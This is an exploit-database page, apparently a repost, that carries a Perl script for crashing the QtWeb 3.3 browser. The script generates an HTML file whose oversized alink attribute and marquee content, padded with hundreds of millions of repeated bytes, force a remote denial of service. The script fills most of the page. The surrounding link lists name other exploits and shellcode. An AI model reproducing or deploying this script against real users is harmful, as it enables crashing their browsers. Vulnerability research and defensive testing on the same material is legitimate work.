首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
QtWeb 3.3 Remote DoS / Crash Exploit
来源:PanamaSecurity.blogspot.com 作者:PoisonCode 发布时间:2010-06-04  

# Title:QtWeb 3.3 Remote DoS/Crash Exploit
# Software Link:http://www.qtweb.net/downloads/QtWeb-setup.exe
# Portable: http://www.qtweb.net/downloads/QtWeb.exe
# Version: 3.3
# Platform:Windows
 
 
_____    _____                      _ _       
|  __ \ / ____|                    (_) |      
| |__) | (___   ___  ___ _   _ _ __ _| |_ _   _
|  ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| |     ____) |  __/ (__| |_| | |  | | |_| |_| |
|_|    |_____/ \___|\___|\__,_|_|  |_|\__|\__, |
                                           __/ |
                                          |___/
Exploit
----------------
#!/usr/bin/perl
# File Name :QtWeb 3.3 Remote DoS/Crash Exploit
# Vuln :Remote Dos/Crash
# Author :PoisonCode
# Exploit Title: QtWeb 3.3 Remote DoS/Crash Exploit
# Date:02/06/2010
# Author:PoisonCode
# Site  :http://www.qtweb.net/
# Software Link: http://www.qtweb.net/downloads/QtWeb-setup.exe
# Portable:http://www.qtweb.net/downloads/QtWeb.exe
# Version: 3.3
# Tested on: Windows
$file="Exploit QtWeb 3.3.html";
print " ======================================\n";
print " = QtWeb 3.3 Remote DoS/Crash Exploit =\n";
print " =        Autor:PoisonCode            =\n";
print " =  Web :PanamaSecurity.blogspot.com  =\n";
print " ======================================\n";
print "\n";
print " Espere Mientras se Genera el Exploit\n";
my $a="\x55" x 100000000;
my $b="\85" x 55900000;
my $c="\x7C\x95\x64\xAE\x00\x96\xbd\x40\x00\x09\8a\86\x5A\x65\x72\x30\x0\x54\x68\x75\x6E\x64\x65\x72";
open(myfile,">>$file");
print myfile "<html>";
print myfile "<title>PanamaSecurity - PoisonCode $c </title>";
print myfile '<head><meta http-equiv="refresh" content="0; url=Exploit QtWeb3.3.html"></head>';
print myfile "<body alink=";
print myfile $a,$b,$c;
print myfile "<marquee>$a,$b,$c</marquee>";
print myfile '">';
print myfile "</html>";
close(myfile);
print "\n";
print " Nombre del Archivo : $file\n";
print " Se Ha Creado El Exploit Correctamente \n";
print "\n";
print "----------------------------------------------------------------------\n";
print " Visiten : PanamaSecurity.blogspot.com\n";



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·linux/x86 whoami shellcode 39
·Solaris/x86 - SystemV killall
·x86 linux hard / unclean reboo
·MP3 Studio v1.0 (mpf File) Loc
·x86 linux hard / unclean reboo
·Adobe InDesign CS3 INDD file h
·Quick 'n Easy FTP Server Lite
·S.O.M.P.L 1.0 Player Buffer Ov
·FeedDemon <= 3.1.0.12 Stack Bu
·33 bytes unlink "/etc/shadow"
·Novell ZENworks Configuration
·58 bytes sys_setdomainname ("t
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved